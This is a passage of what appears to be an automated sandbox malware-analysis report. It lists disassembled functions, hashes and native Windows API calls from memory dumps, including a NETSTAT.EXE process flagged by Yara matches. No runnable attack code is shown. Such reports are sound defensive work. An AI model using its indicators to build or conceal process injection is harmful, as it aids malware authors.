                                                                                                                                                      Function 1E935B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                                      • Opcode ID: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction ID: bc3b4e6b1089beb7e32d916fe1d3c012bcd337d921a61a98c7cccc1e2e8e0d6b
                                                                                                                                                      • Opcode Fuzzy Hash: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction Fuzzy Hash: 7321F7B990015DBFEB029BA48D84DFF7B7DFF49299B140654FA01A2240EB30EE01DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DEE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction ID: 334d5de6910d52b6bca45d495cbf0c4510ebf8ca9fd50bc3a81404120ee235bb
                                                                                                                                                      • Opcode Fuzzy Hash: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction Fuzzy Hash: D9E10274D00749CFCB25CFAAC980A9DBBF6FF48314F104A6AE446A72A4D730A885DF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92EBD0, Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
                                                                                                                                                      • Instruction ID: 41df72a2d3e60a360b3a87d5a599b17b041d118d0044bd20ad47cdca7ce784be
                                                                                                                                                      • Opcode Fuzzy Hash: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
                                                                                                                                                      • Instruction Fuzzy Hash: CD712275E0022A9FDF06CFA4C884BEDBBB5BF48314F54462AE905BB258D734A901CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98A04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction ID: 10a79a7269905eea22202fb4548abb4920e13e959e3ffc25b23b305d866aa4bf
                                                                                                                                                      • Opcode Fuzzy Hash: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction Fuzzy Hash: 3A519A7471461A9FDB49CE19C8A0E19B3E6FF8A310B144A6DD906CB724DBB9EC41CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
                                                                                                                                                      • Instruction ID: 8e0748d64d182366c6a5ca62509513fac4986041ce5f299f19474a673048847f
                                                                                                                                                      • Opcode Fuzzy Hash: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
                                                                                                                                                      • Instruction Fuzzy Hash: B55132B2E1121A9FDF09CF95D880AEDBBB6BF88314F04822EE805BB254D7359940CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E7A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                                      • Opcode ID: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
                                                                                                                                                      • Instruction ID: b198efc23697de7da5c5f3158354c0751314f573068ce5749adddb57e1a544b2
                                                                                                                                                      • Opcode Fuzzy Hash: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
                                                                                                                                                      • Instruction Fuzzy Hash: 2F31E279E14269EFCF15DFA8D884A9DBBB1BF88720F10462AE511B7294D7355900CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
                                                                                                                                                      • Instruction ID: acf76b2e07ccf47a08d1daa09b3de710dd2e71b7ca9a6eb1219dade3d095b5f2
                                                                                                                                                      • Opcode Fuzzy Hash: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
                                                                                                                                                      • Instruction Fuzzy Hash: 8A324674D142AACFDB21CF69C844BDDBBB6BB08304F0446E9D449A7391D775AA84CFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E4B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      • Opcode ID: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
                                                                                                                                                      • Instruction ID: 4a34c8c51880db264d4ad472193fb63e75de21af0e0629e119e44ccb73a3efb7
                                                                                                                                                      • Opcode Fuzzy Hash: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
                                                                                                                                                      • Instruction Fuzzy Hash: AC51CCB1E1068A8FCB11CF99C48475DFBF6EF85714F54C62ED4499B688E7B09981CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B0485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8B0586
                                                                                                                                                      • kLsE, xrefs: 1E8B05FE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      • Opcode ID: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
                                                                                                                                                      • Instruction ID: 520aa1bc67232efbc796ce0e24342776ac1376ec7a2ae064a2977389b5560793
                                                                                                                                                      • Opcode Fuzzy Hash: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
                                                                                                                                                      • Instruction Fuzzy Hash: C351D1B5A0078ADFDB24DFA9C4406EBB7F9AF44300F004A3ED5A597740E730A546CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8ADF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      • Opcode ID: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
                                                                                                                                                      • Instruction ID: 0e1a7a5f8e39c93208e956d95e0097eb3e309448b68dd43667f3a77321da4b14
                                                                                                                                                      • Opcode Fuzzy Hash: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
                                                                                                                                                      • Instruction Fuzzy Hash: 7E414CB16087469FC300CF29C484A5BBBE5BF89318F044A6EF588DB381D771EA45CB96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: NETSTAT.EXE PID: 4520 Parent PID: 4528 NETSTAT.EXECOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 007E85E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 418 7e85e0-7e8631 call 7e91e0 NtCreateFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,007E3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007E3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 007E862D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction ID: 7f13da8e9ee60c1daef99801db30a8e1c1d5ed2a802f0e2d23e4f5dda8c1a6a8
                                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction Fuzzy Hash: CCF0BDB2205208ABCB08CF89DC85EEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E8690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 421 7e8690-7e86d9 call 7e91e0 NtReadFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:~,FFFFFFFF,?,r=~,?,00000000), ref: 007E86D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:~
                                                                                                                                                      • API String ID: 2738559852-1224529143
                                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction ID: c4a5698de21a8db49ce97d58fe5fd43d6d90c4f4cb474327145b17a1180dd3c8
                                                                                                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction Fuzzy Hash: FAF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241D630E911CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E868D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33filenativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 424 7e868d-7e86a6 426 7e86ac-7e86d9 NtReadFile 424->426 427 7e86a7 call 7e91e0 424->427 427->426
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:~,FFFFFFFF,?,r=~,?,00000000), ref: 007E86D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:~
                                                                                                                                                      • API String ID: 2738559852-1224529143
                                                                                                                                                      • Opcode ID: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                                                      • Instruction ID: 6f0eed499fff0a628705110e37ae2d1db4e35e1f0f8a5fe59c36f41bdc11bf59
                                                                                                                                                      • Opcode Fuzzy Hash: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
                                                                                                                                                      • Instruction Fuzzy Hash: 86F017B6204049ABCB04DF99D894CEB77ADBF8C354B15828DFA1CA7201C630E855CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E870A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 437 7e870a-7e8726 438 7e872c-7e8739 NtClose 437->438 439 7e8727 call 7e91e0 437->439 439->438
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=~,?,?,007E3D50,00000000,FFFFFFFF), ref: 007E8735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=~
                                                                                                                                                      • API String ID: 3535843008-1319691047
                                                                                                                                                      • Opcode ID: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                                                      • Instruction ID: 1058bfa0c2bd6b9d0e9c79c8695f8bd52a9abf41cec0664f5b2a1d54389c50fa
                                                                                                                                                      • Opcode Fuzzy Hash: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
                                                                                                                                                      • Instruction Fuzzy Hash: 75E08671600114AFD720DFA4CC86EDB7B69EF44350F14415DF909DB642C630E610CBD0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E8710, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 440 7e8710-7e8739 call 7e91e0 NtClose
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=~,?,?,007E3D50,00000000,FFFFFFFF), ref: 007E8735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=~
                                                                                                                                                      • API String ID: 3535843008-1319691047
                                                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction ID: 1ce015efbfe15d9ad678e16bf981c09b3d57b57930895ce730911e4ca2b84e9a
                                                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                      • Instruction Fuzzy Hash: DBD01776200218ABD710EB99CC89EA77BACEF48760F154499BA189B242C530FA00C6E0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E87C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007D2D11,00002000,00003000,00000004), ref: 007E87F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction ID: 6a3dc9f93d7f91d42d80e91c88672a32d94caee3ba2705384037b363cc512b1a
                                                                                                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                      • Instruction Fuzzy Hash: 3BF015B2200208ABCB14DF89CC85EAB77ADAF8C750F118148FE0897241C630F910CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007E87C2, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007D2D11,00002000,00003000,00000004), ref: 007E87F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      • Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                      • Instruction ID: 9477bd692c044644b26803db2f8b94c6bd4c71ed3b0bc7ece377d437c5c2f3d4
                                                                                                                                                      • Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                      • Instruction Fuzzy Hash: D6F015B2200108AFCB14DF89CC84EEB77A9AF8C350F118248FA0897241C630E911CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 0d6d47384fbe96ac61e388f1bb59ec55af500b3b8fa8248b1f6475f68297fb8f
                                                                                                                                                      • Instruction ID: e83c79871f352ec03d70242e0cdec41d446a9d31661ff53d1541cb7984d79154
                                                                                                                                                      • Opcode Fuzzy Hash: 0d6d47384fbe96ac61e388f1bb59ec55af500b3b8fa8248b1f6475f68297fb8f
                                                                                                                                                      • Instruction Fuzzy Hash: 0E90023561240C02D584B15C454464A0509C7D1302F91C419A0015A54DCF258A5977A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 0c7e2cb7c61e7f49dac011688bc43ece017d7e5f79a0d2b5d51e531173712d09
                                                                                                                                                      • Instruction ID: e5ae619eab2fcc4984ce9fea27786cd84a5b51a50f9e1a3442077ced3eb8c503
                                                                                                                                                      • Opcode Fuzzy Hash: 0c7e2cb7c61e7f49dac011688bc43ece017d7e5f79a0d2b5d51e531173712d09
                                                                                                                                                      • Instruction Fuzzy Hash: 2B90023561644C42D544B15C4544A460519C7D0306F51C415A0054A94DDB358D55B661
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 03392B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
